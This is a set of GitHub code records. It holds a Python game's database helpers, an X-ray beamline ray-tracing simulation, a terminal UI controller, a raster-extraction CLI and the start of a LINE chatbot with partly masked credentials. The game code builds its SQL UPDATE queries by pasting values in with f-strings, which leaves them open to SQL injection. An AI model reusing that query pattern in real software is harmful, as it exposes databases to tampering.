cur.execute(f\"UPDATE users SET xp=xp+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper+'{m}' WHERE uid='{id}'\")\r\n db.commit()\r\n return x, m\r\n\r\n def casino(id, idc, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n if idc == 1:\r\n x = random.randint(0,1)\r\n if x == 0:\r\n cur.execute(f\"UPDATE users SET copper=copper-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n return 0\r\n if x == 1:\r\n cur.execute(f\"UPDATE users SET copper=copper+'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n return 1","repo_name":"Tyzie/crossreverie","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6717997384","text":"import Shadow\nimport numpy\nfrom srxraylib.util.h5_simple_writer import H5SimpleWriter\nimport scipy.constants as codata\n\ndef ev_to_m(photon_energy):\n \"\"\" very short function just to get the wavelength in meters from the photon\n energy in eV using the formula: lambda = hc/E\"\"\"\n # scipy plack constant is in J/s, which is transformed to eV/s \n return (codata.h / codata.electron_volt * codata.c / photon_energy)\n\ndef photon_source(photon_energy):\n \"\"\" Function to convolve the electron beam size with the ID\n for now is only for U42 \"\"\"\n #electron properties\n e_size_h = 3.043e-05\n e_size_v = 3.645e-06\n e_div_h = 4.4e-06\n e_div_v = 1.37e-06\n #u42 length\n u42_l = 1.62\n #photon source\n photon_divx = numpy.sqrt((e_div_h)**2 + \\\n (0.69 * numpy.sqrt(ev_to_m(photon_energy) / u42_l))**2) \n photon_divy = numpy.sqrt((e_div_v)**2 + \\\n (0.69 * numpy.sqrt(ev_to_m(photon_energy) / u42_l))**2)\n photon_sx = numpy.sqrt((e_size_h)**2 + ((2.740 / (4 * numpy.pi)) \\\n * numpy.sqrt(ev_to_m(photon_energy) * u42_l))**2)\n photon_sy = numpy.sqrt((e_size_v)**2 + ((2.740 / (4 * numpy.pi)) \\\n * numpy.sqrt(ev_to_m(photon_energy) * u42_l))**2)\n\n return photon_divx, photon_divy, photon_sx, photon_sy \n\ndef dcmadeg(photon_energy):\n \"\"\" Short function to get the crystal angle in degress in function \n for now is only for Si(111) \"\"\"\n # Si (111) D spacing [m]\n dspa = 3.135416e-10\n\n return numpy.around((numpy.arcsin(ev_to_m(photon_energy)/(2 * dspa)) * 180 / numpy.pi), 10)\n\ndef foc_dist(working_distance, kbm='vfm'):\n \"\"\" This function gets the focal distance in meters for a given working\n distance (m) and a KB mirror: 'vfm' or 'hfm'. 
For the present ID21 SXM-II\n \"\"\"\n ver_p = 50.1 #distance of vfm to source\n hor_p = 50.19 #distance of hfm to source\n hfm_l = 0.06 #hfm length\n\n if kbm == 'vfm':\n q = hor_p - ver_p + hfm_l/2 + working_distance\n elif kbm == 'hfm':\n q = hfm_l/2 + working_distance\n else:\n raise RuntimeError(\"ERROR: Unidentified mirror, please enter 'vfm' or hfm'\")\n \n return numpy.around(q, decimals=2)\n\ndef diff_fwhm(photon_energy, working_distance, kbm='vfm'):\n \"\"\" This function provides a diffraction contribution term\n (in meters) to include it in the simulations results \"\"\"\n\n #both mirrors grazing angle\n m_angle = 0.006\n\n if kbm == 'vfm':\n mirror_active_length = 0.090\n b_i = mirror_active_length * numpy.sin(m_angle) #beam intercept by mirror (b_i) \n n_a = (b_i/2)/foc_dist(working_distance, kbm='vfm') #numerical aperture (n_a)\n \n elif kbm == 'hfm':\n mirror_active_length = 0.050\n b_i = mirror_active_length * numpy.sin(m_angle) \n n_a = (b_i/2)/foc_dist(working_distance, kbm='hfm')\n \n else:\n raise RuntimeError(\"ERROR: Unidentified mirror, please enter 'vfm' or hfm'\")\n\n #difracction FWHM contribution (diff) get the wavelength first in meters\n diff = 0.44 * (ev_to_m(photon_energy) / n_a)\n \n return diff \n\ndef run_shadow(photon_energy, working_distance, n_rays=1e6):\n \n \"\"\"This function run shadow for the full beamline\"\"\"\n \n # write (1) or not (0) SHADOW files start.xx end.xx star.xx\n iwrite = 0 \n #\n # initialize shadow3 source (oe0) and beam\n #\n beam = Shadow.Beam()\n oe0 = Shadow.Source()\n oe1 = Shadow.OE()\n oe2 = Shadow.OE()\n oe3 = Shadow.OE()\n oe4 = Shadow.OE()\n oe5 = Shadow.OE()\n oe6 = Shadow.OE()\n oe7 = Shadow.OE()\n oe8 = Shadow.OE()\n oe9 = Shadow.OE()\n oe10 = Shadow.OE()\n oe11 = Shadow.OE() \n #\n # Define variables. 
See meaning of variables in: \n # https://raw.githubusercontent.com/srio/shadow3/master/docs/source.nml \n # https://raw.githubusercontent.com/srio/shadow3/master/docs/oe.nml\n #\n # Source \n oe0.FDISTR = 3\n oe0.F_COLOR = 3\n oe0.F_PHOT = 0\n oe0.HDIV1 = 0.0\n oe0.HDIV2 = 0.0\n oe0.ISTAR1 = 0\n oe0.NPOINT = n_rays\n oe0.PH1 = photon_energy - 2.5 #small bandwidth\n oe0.PH2 = photon_energy + 2.5 #small bandwidth\n oe0.SIGDIX = photon_source(photon_energy)[0]\n oe0.SIGDIZ = photon_source(photon_energy)[1]\n oe0.SIGMAX = photon_source(photon_energy)[2]\n oe0.SIGMAZ = photon_source(photon_energy)[3]\n oe0.VDIV1 = 0.0\n oe0.VDIV2 = 0.0\n # Primary Slits\n oe1.DUMMY = 100.0\n oe1.FWRITE = 3\n oe1.F_REFRAC = 2\n oe1.F_SCREEN = 1\n oe1.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe1.N_SCREEN = 1\n oe1.RX_SLIT = numpy.array([0.00175, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe1.RZ_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe1.T_IMAGE = 0.0\n oe1.T_INCIDENCE = 0.0\n oe1.T_REFLECTION = 180.0\n oe1.T_SOURCE = 27.2\n #M0_1\n oe2.ALPHA = 90.0\n oe2.DUMMY = 100.0\n oe2.FHIT_C = 1\n if 2500 <= photon_energy <= 7000:\n oe2.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe2.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_1_Ni_shadow.dat'\n elif 7000 < photon_energy <= 10000:\n oe2.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Pt.dat'\n oe2.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_1_Pt_shadow.dat'\n else:\n raise RuntimeError(f\"ERROR: Photon energy {photon_energy} eV out of range\")\n oe2.FWRITE = 3\n oe2.F_G_S = 2\n oe2.F_REFLEC = 1\n oe2.F_RIPPLE = 1\n oe2.RLEN1 = 0.11\n oe2.RLEN2 = 0.11\n oe2.RWIDX1 = 0.04\n oe2.RWIDX2 = 0.04\n oe2.T_IMAGE = 0.0\n oe2.T_INCIDENCE = 89.5989295434\n oe2.T_REFLECTION = 89.5989295434\n oe2.T_SOURCE = 2.7\n #M0_2\n oe3.ALPHA = 180.0\n oe3.DUMMY = 100.0\n oe3.FHIT_C = 1\n if 2500 <= photon_energy <= 7000:\n oe3.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe3.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_2_Ni_shadow.dat'\n elif 7000 < photon_energy <= 10000:\n oe3.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Pt.dat'\n oe3.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_2_Pt_shadow.dat'\n else:\n raise RuntimeError(f\"ERROR: Photon energy {photon_energy} eV out of range\") \n oe3.FWRITE = 3\n oe3.F_G_S = 2\n oe3.F_MOVE = 1\n oe3.F_REFLEC = 1\n oe3.F_RIPPLE = 1\n oe3.OFFY = -0.212\n oe3.RLEN1 = 0.484125\n oe3.RLEN2 = 0.484125\n oe3.RWIDX1 = 0.04\n oe3.RWIDX2 = 0.04\n oe3.T_IMAGE = 0.0\n oe3.T_INCIDENCE = 89.5989295434\n oe3.T_REFLECTION = 89.5989295434\n oe3.T_SOURCE = 0.825\n #Empty element\n oe4.ALPHA = 90.0\n oe4.DUMMY = 100.0\n oe4.FWRITE = 3\n oe4.F_REFRAC = 2\n oe4.T_IMAGE = 0.0\n oe4.T_INCIDENCE = 0.0\n oe4.T_REFLECTION = 180.0\n oe4.T_SOURCE = 0.0\n #Secondary Slits\n oe5.DUMMY = 100.0\n oe5.FWRITE = 3\n oe5.F_REFRAC = 2\n oe5.F_SCREEN = 1\n oe5.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe5.N_SCREEN = 1\n oe5.RX_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe5.RZ_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe5.T_IMAGE = 0.0\n oe5.T_INCIDENCE = 0.0\n oe5.T_REFLECTION = 180.0\n oe5.T_SOURCE = 5.475\n #DCM-1\n oe6.DUMMY = 100.0\n oe6.FHIT_C = 1\n oe6.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Si2_15.111'\n oe6.FWRITE = 1\n oe6.F_CENTRAL = 1\n oe6.F_CRYSTAL = 1\n 
oe6.PHOT_CENT = photon_energy\n oe6.RLEN1 = 0.008\n oe6.RLEN2 = 0.072\n oe6.RWIDX1 = 0.005\n oe6.RWIDX2 = 0.005\n oe6.R_LAMBDA = 5000.0\n oe6.T_IMAGE = 0.0\n oe6.T_INCIDENCE = 90 - dcmadeg(photon_energy)\n oe6.T_REFLECTION = 90 - dcmadeg(photon_energy)\n oe6.T_SOURCE = 1.9\n #DCM-2\n oe7.ALPHA = 180.0\n oe7.DUMMY = 100.0\n oe7.FHIT_C = 1\n oe7.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Si2_15.111'\n oe7.FWRITE = 1\n oe7.F_CENTRAL = 1\n oe7.F_CRYSTAL = 1\n oe7.PHOT_CENT = photon_energy\n oe7.RLEN1 = 0.008\n oe7.RLEN2 = 0.072\n oe7.RWIDX1 = 0.005\n oe7.RWIDX2 = 0.005\n oe7.R_LAMBDA = 5000.0\n oe7.T_IMAGE = 0.0\n oe7.T_INCIDENCE = 90 - dcmadeg(photon_energy)\n oe7.T_REFLECTION = 90 - dcmadeg(photon_energy)\n oe7.T_SOURCE = 0.012\n #KB Slits \n oe8.DUMMY = 100.0\n oe8.FWRITE = 3\n oe8.F_REFRAC = 2\n oe8.F_SCREEN = 1\n oe8.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe8.N_SCREEN = 1\n oe8.RX_SLIT = numpy.array([0.0003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe8.RZ_SLIT = numpy.array([0.00054, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe8.T_IMAGE = 0.0\n oe8.T_INCIDENCE = 0.0\n oe8.T_REFLECTION = 180.0\n oe8.T_SOURCE = 11.488\n #VFM\n oe9.DUMMY = 100.0\n oe9.FCYL = 1\n oe9.FHIT_C = 1\n oe9.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe9.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/VFM_sim_0.6urad.dat'\n oe9.FMIRR = 2\n oe9.FWRITE = 1\n oe9.F_DEFAULT = 0\n oe9.F_G_S = 2\n oe9.F_REFLEC = 1\n oe9.F_RIPPLE = 1\n oe9.RLEN1 = 0.045\n oe9.RLEN2 = 0.045\n oe9.RWIDX1 = 0.015\n oe9.RWIDX2 = 0.015\n oe9.SIMAG = foc_dist(working_distance, kbm='vfm')\n oe9.SSOUR = 51.5\n oe9.THETA = 89.6562253229\n oe9.T_IMAGE = 0.0575\n oe9.T_INCIDENCE = 89.6562253229\n oe9.T_REFLECTION = 89.6562253229\n oe9.T_SOURCE = 0.5\n #HFM\n oe10.ALPHA = 90.0\n oe10.DUMMY = 100.0\n oe10.FCYL = 1\n oe10.FHIT_C = 1\n oe10.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe10.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/HFM_sim_0.6urad.dat'\n oe10.FMIRR = 2\n oe10.FWRITE = 1\n oe10.F_DEFAULT = 0\n oe10.F_G_S = 2\n oe10.F_REFLEC = 1\n oe10.F_RIPPLE = 1\n oe10.RLEN1 = 0.025\n oe10.RLEN2 = 0.025\n oe10.RWIDX1 = 0.015\n oe10.RWIDX2 = 0.015\n oe10.SIMAG = foc_dist(working_distance, kbm='hfm')\n oe10.SSOUR = 51.59\n oe10.THETA = 89.6562253229\n oe10.T_IMAGE = foc_dist(working_distance, kbm='hfm')\n oe10.T_INCIDENCE = 89.6562253229\n oe10.T_REFLECTION = 89.6562253229\n oe10.T_SOURCE = 0.0325\n #Sample\n oe11.ALPHA = 90.0\n oe11.DUMMY = 100.0\n oe11.FWRITE = 3\n oe11.F_REFRAC = 2\n oe11.T_IMAGE = 0.0\n oe11.T_INCIDENCE = 0.0\n oe11.T_REFLECTION = 180.0\n oe11.T_SOURCE = 0.0 \n \n #Run SHADOW to create the source\n \n if iwrite:\n oe0.write(\"start.00\")\n \n beam.genSource(oe0)\n \n if iwrite:\n oe0.write(\"end.00\")\n beam.write(\"begin.dat\") \n \n #\n #run optical element 1\n #\n print(\" Running optical element: %d\"%(1))\n if iwrite:\n oe1.write(\"start.01\")\n \n beam.traceOE(oe1,1)\n \n if iwrite:\n oe1.write(\"end.01\")\n beam.write(\"star.01\") \n \n #\n #run optical element 2\n #\n print(\" Running optical element: %d\"%(2))\n if iwrite:\n oe2.write(\"start.02\")\n \n beam.traceOE(oe2,2)\n \n if iwrite:\n oe2.write(\"end.02\")\n beam.write(\"star.02\") \n \n #\n #run optical element 3\n #\n print(\" Running optical element: %d\"%(3))\n if iwrite:\n oe3.write(\"start.03\")\n \n beam.traceOE(oe3,3)\n \n if iwrite:\n oe3.write(\"end.03\")\n beam.write(\"star.03\") \n \n #\n #run optical element 4\n #\n print(\" 
Running optical element: %d\"%(4))\n if iwrite:\n oe4.write(\"start.04\")\n \n beam.traceOE(oe4,4)\n \n if iwrite:\n oe4.write(\"end.04\")\n beam.write(\"star.04\") \n \n #\n #run optical element 5\n #\n print(\" Running optical element: %d\"%(5))\n if iwrite:\n oe5.write(\"start.05\")\n \n beam.traceOE(oe5,5)\n \n if iwrite:\n oe5.write(\"end.05\")\n beam.write(\"star.05\") \n \n #\n #run optical element 6\n #\n print(\" Running optical element: %d\"%(6))\n if iwrite:\n oe6.write(\"start.06\")\n \n beam.traceOE(oe6,6)\n \n if iwrite:\n oe6.write(\"end.06\")\n beam.write(\"star.06\") \n \n #\n #run optical element 7\n #\n print(\" Running optical element: %d\"%(7))\n if iwrite:\n oe7.write(\"start.07\")\n \n beam.traceOE(oe7,7)\n \n if iwrite:\n oe7.write(\"end.07\")\n beam.write(\"star.07\") \n \n #\n #run optical element 8\n #\n print(\" Running optical element: %d\"%(8))\n if iwrite:\n oe8.write(\"start.08\")\n \n beam.traceOE(oe8,8)\n \n if iwrite:\n oe8.write(\"end.08\")\n beam.write(\"star.08\") \n \n #\n #run optical element 9\n #\n print(\" Running optical element: %d\"%(9))\n if iwrite:\n oe9.write(\"start.09\")\n \n beam.traceOE(oe9,9)\n \n if iwrite:\n oe9.write(\"end.09\")\n beam.write(\"star.09\") \n \n #\n #run optical element 10\n #\n print(\" Running optical element: %d\"%(10))\n if iwrite:\n oe10.write(\"start.10\")\n \n beam.traceOE(oe10,10)\n \n if iwrite:\n oe10.write(\"end.10\")\n beam.write(\"star.10\") \n \n #\n #run optical element 11\n #\n print(\" Running optical element: %d\"%(11))\n if iwrite:\n oe11.write(\"start.11\")\n \n beam.traceOE(oe11,11)\n \n if iwrite:\n oe11.write(\"end.11\")\n beam.write(\"star.11\")\n\n return beam, oe0\n\ndef write_output(working_distance, photon_energies, n_rays):\n \"\"\" This function writes an h5 output file, from a given photon\n energies array, and a working distance, please notice diffraction\n contribution is taken into account to get the final FWHMs\"\"\"\n #output tempo arrays\n out = numpy.zeros((8, photon_energies.size))\n \n for i, photon_energy in enumerate(photon_energies):\n \n beam, oe0 = run_shadow(photon_energy, working_distance, n_rays=n_rays)\n\n histo2 = beam.histo2(1, 3, nolost=1, nbins = 201)\n\n out[0,i] = photon_energy\n out[1,i] = histo2['fwhm_h'] * 1e6 # horizontal fwhm microns\n out[2,i] = histo2['fwhm_v'] * 1e6 # vertical fwhm microns\n out[3,i] = beam.intensity(nolost=1)/oe0.NTOTALPOINT #Beamline transmitivity\n out[4,i] = numpy.sqrt((histo2['fwhm_h']*1e6)**2 + (diff_fwhm(photon_energy, working_distance, kbm='hfm')*1e6)**2) #considering diff factor\n out[5,i] = numpy.sqrt((histo2['fwhm_v']*1e6)**2 + (diff_fwhm(photon_energy, working_distance, kbm='vfm')*1e6)**2) #considering diff factor\n out[6,i] = beam.intensity(nolost=1) #Beamline intensity\n out[7,i] = oe0.NTOTALPOINT #Total initial rays\n \n h5w = H5SimpleWriter.initialize_file(f'shadow_sxm2_work_dist_{working_distance*1e3}_mm.h5',\n creator=\"h5_basic_writer.py\")\n h5w.create_entry(f'work_dist_{working_distance*1e3}_mm', nx_default=\"Beam Size\")\n\n h5w.add_dataset(out[0,:], out[1,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Beam Size Horizontal\",\n title_x='Photon Energy (eV)', title_y='FWHM_H (um)')\n h5w.add_dataset(out[0,:], out[2,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Beam Size Vertical\",\n title_x='Photon Energy (eV)', title_y='FWHM_V (um)')\n h5w.add_dataset(out[0,:], out[3,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Transmitivity\",\n 
title_x='Photon Energy (eV)', title_y='Beamline transmitivity')\n h5w.add_dataset(out[0, :], out[4, :], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name = \"Beam Size Horizontal (DL)\",\n title_x = 'Photon Energy (eV)', title_y = 'FWHM_H (um)')\n h5w.add_dataset(out[0, :], out[5, :], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name = \"Beam Size Vertical (DL)\",\n title_x = 'Photon Energy (eV)', title_y = 'FWHM_V (um)')\n h5w.add_dataset(out[0,:], out[6,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Intensity\",\n title_x='Photon Energy (eV)', title_y='Intensity')\n h5w.add_dataset(out[0,:], out[7,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Total initial rays\",\n title_x='Photon Energy (eV)', title_y='Total initial rays') \n\n\n print(f'shadow_sxm2_work_dist_{working_distance*1e3}_mm.h5 has been save on disk') \n\nif __name__ == \"__main__\":\n #test\n #photon_energies = numpy.array([5000, 9000])\n #working_distances = [0.03]\n\n #simulations\n\n #working_distances = [0.03, 0.04, 0.05, 0.06] # 4 working distances \n #photon_energies = numpy.arange(2500, 10000, 800) # 10 steps \n#\n #for working_distance in working_distances:\n # write_output(working_distance, photon_energies, n_rays=10e6)\n pass\n","repo_name":"jureyherrera/scripts_and_workspaces","sub_path":"id21/shadow_sxm2.py","file_name":"shadow_sxm2.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27968991997","text":"import shutil\r\nfrom typing import Callable, Tuple\r\n\r\nfrom engine.types.aliases import InputHandler\r\nfrom definitions import os_name\r\n\r\nMIN_HEIGHT = 20 # The minimum height of the console\r\n\r\nclass TerminalController(object):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # Terminal metadata\r\n self.terminal_height = shutil.get_terminal_size((80, 20)).lines\r\n self.terminal_width = shutil.get_terminal_size((80, 20)).columns\r\n\r\n # Initiate text positions\r\n self.main_title_pos = 1\r\n self.secondary_title_pos = 3\r\n self.first_text_pos = 7\r\n self.second_text_pos = 12\r\n self.hidden_text_pos = 14\r\n self.input_pos = 16\r\n\r\n # Initiate text\r\n self.main_title = \"\"\r\n self.secondary_title = \"\"\r\n self.first_text = \"\"\r\n self.second_text = \"\"\r\n self.hidden_text = \"\"\r\n\r\n # Initiate metadata\r\n self.view_hidden = False\r\n self.input_array = []\r\n\r\n if self.terminal_height < MIN_HEIGHT:\r\n raise Exception(\"Terminal size is too small\")\r\n \r\n def wipe_screen(self):\r\n \"\"\"\r\n Wipe the screen clean.\r\n \"\"\"\r\n if os_name == \"linux\":\r\n self.move(0)\r\n print((\" \" * self.terminal_width + \"\\r\\n\") * self.terminal_height)\r\n self.move(0)\r\n else:\r\n pass\r\n\r\n def move(self, y: int):\r\n \"\"\"\r\n Move the cursor to a position on the screen.\r\n \r\n :param x: the X position.\r\n :type x: int\r\n :param y: the Y position.\r\n :type y: int\r\n \"\"\"\r\n if os_name == \"linux\":\r\n print(\"\\033[{};{}H\".format(y, 0), end=\"\")\r\n else:\r\n pass\r\n \r\n def get_input(self, input_callback: InputHandler = lambda a: (a, False) \\\r\n if a != \"q\" \\\r\n else (a, True)) \\\r\n -> bool:\r\n \"\"\"\r\n Get input from the user via the terminal.\r\n \r\n :param input_callback: A function which processes the user input,\r\n returns print value and whether or not to continue\r\n getting input.\r\n :type input_callback: InputHandler, optional\r\n :return: the 
boolean result of the callable method.\r\n :rtype: bool\r\n \"\"\"\r\n input_string = \" > \"\r\n user_input = input(input_string)\r\n self.input_array.append(input_string + user_input)\r\n\r\n response = input_callback(user_input)\r\n if isinstance(response[1], list):\r\n self.input_array.extend(response[1])\r\n else:\r\n self.input_array.append(response[1])\r\n\r\n self.refrash_input()\r\n\r\n return response[0]\r\n \r\n def print_at(self, text: str, position: int):\r\n \"\"\"\r\n Print given text at given position.\r\n \r\n :param text: text to print.\r\n :type text: str\r\n :param position: position to print at.\r\n :type position: int\r\n \"\"\"\r\n self.move(position)\r\n print(text)\r\n \r\n def refrash(self):\r\n \"\"\"\r\n Refrash display.\r\n \"\"\"\r\n self.wipe_screen()\r\n\r\n # Set main title\r\n self.print_at(\" \" * ((self.terminal_width - len(self.main_title)) // 2) + \r\n self.main_title.upper() + \r\n \" \" * self.terminal_width,\r\n self.main_title_pos)\r\n\r\n # Set secondary title\r\n wrapper = \"-\" * ((self.terminal_width - len(self.secondary_title)) // 3)\r\n self.print_at(wrapper + self.secondary_title + wrapper * 2,\r\n self.secondary_title_pos)\r\n\r\n # Set first text\r\n self.print_at(self.first_text, self.first_text_pos)\r\n print(\"\")\r\n # Set secondary text\r\n self.print_at(self.second_text, self.second_text_pos)\r\n\r\n # Set hidden text\r\n if self.view_hidden:\r\n self.print_at(self.hidden_text, self.hidden_text_pos)\r\n\r\n # Set the input\r\n self.print_at(\"-\" * self.terminal_width, self.input_pos)\r\n\r\n self.input_array = []\r\n self.view_hidden = False\r\n \r\n def refrash_input(self):\r\n \"\"\"\r\n Refrash the input view\r\n \"\"\"\r\n # Wipe input screen\r\n if os_name == \"linux\":\r\n self.move(self.input_pos + 1)\r\n print((\" \" * self.terminal_width + \"\\r\\n\") * (self.terminal_height - self.input_pos - 2))\r\n\r\n self.move(self.input_pos + 1)\r\n left_rows = self.terminal_height - self.input_pos - 3\r\n\r\n print(\"\\r\\n\".join(self.input_array[-left_rows:]))\r\n else:\r\n print(\"\\r\\n\".join(self.input_array[1:]))\r\n self.input_array = []\r\n \r\n def enable_hidden_text(self):\r\n \"\"\"\r\n Show the hidden text and update the screen.\r\n \"\"\"\r\n self.view_hidden = True\r\n self.refrash()\r\n\r\n","repo_name":"GaintDwarf/py_adventure","sub_path":"UI/terminal_controller.py","file_name":"terminal_controller.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71683273878","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport eovx\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Data extraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-g', '--geometry', dest='geometry', help='The geometry file', default=None)\n parser.add_argument('-v', '--values', dest='values', help='The raster values', default=None, nargs='+')\n parser.add_argument('-p', '--pattern', dest='pattern', help='The glob search pattern', default=None)\n parser.add_argument('-r', '--use-ray', dest='use_ray', help='Whether to use ray', action='store_true')\n parser.add_argument('-t', '--use-concurrency', dest='use_concurrency', help='Whether to use concurrent.futures', action='store_true')\n parser.add_argument('-n', '--num-cpus', dest='num_cpus', help='The number of CPUs to use for concurrent threading',\n default=1, type=int)\n parser.add_argument('-c', '--chunks', dest='chunks', help='The chunk 
size', default=1024, type=int)\n parser.add_argument('-b', '--band-names', dest='band_names', help='Band names', default=None, nargs='+')\n parser.add_argument('-o', '--outfile', dest='out_file', help='The output file', default=None)\n parser.add_argument('--version', dest='version', help='Show the version', action='store_true')\n\n args = parser.parse_args()\n\n if args.version:\n print(eovx.__version__)\n return\n\n ex = eovx.Extractor(args.geometry,\n num_cpus=args.num_cpus)\n\n df = ex.extract(args.values[0] if len(args.values) == 1 else args.values,\n pattern=args.pattern,\n use_ray=args.use_ray,\n use_concurrency=args.use_concurrency,\n chunks=args.chunks,\n band_names=args.band_names)\n\n if str(args.out_file).lower().endswith('.gpkg'):\n df.to_file(args.out_file, driver='GPKG')\n elif str(args.out_file).lower().endswith('.shp'):\n df.to_file(args.out_file, driver='ESRI Shapefile')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jgrss/eovx","sub_path":"eovx/scripts/eovx.py","file_name":"eovx.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"37414372937","text":"\n\"\"\"\ngit add .\ngit commit -am \"make it better\"\ngit push heroku master\n\n\"\"\"\n \nfrom flask import Flask, request, abort\nfrom linebot import (LineBotApi, WebhookHandler)\nfrom linebot.exceptions import (InvalidSignatureError)\nfrom linebot.models import *\nfrom random import choice\n\n\n\n\napp = Flask(__name__)\n\n# 設定linebot的基本資訊\nline_bot_api = LineBotApi('xxxxxxxxxxxxxxxxHio3aN15PTUu2isIxcxfwdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('xxxxxxxxxxxxxxx4547d2304')\n\n\n# 設定route 和 webhook\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n# 貼圖handle\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker_message(event):\n\n line_bot_api.reply_message(\n event.reply_token,\n StickerSendMessage(sticker_id = choice(['146','145','140','170','507']),\n\t\t\t\t\t\t package_id = '2'))\n\t\n\n\n\n\n\n# 文字handle\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n\ttext = event.message.text\n\n\t\n\tif (\"掰\" in text) or (\"滾\" == text) or (\"討厭你\" in text):\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tStickerSendMessage(sticker_id = choice(['507', '27', '32']),\n\t\t\t\t\t\t\t package_id = '2'))\n\n\t\t\n\t\t\n\telif \"終極密碼\" == text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"這個功能還在開發中哦~\"\"\"))\n\t\t\n\t\t\t\n\telif \"ㄉ一ㄨˊ\" in text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"ㄉ一ㄨˊㄉ一ㄨˊ的\"\"\"))\t\n\t\t\t\n\t\t\t\n\telif \"加油\" == text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"加油~加油~\"\"\"))\n\t\t\t\n\t\t\t\n\telif \"功能\" == text:\n\t\tbuttons_template = TemplateSendMessage(\n\t\t\talt_text='Buttons 
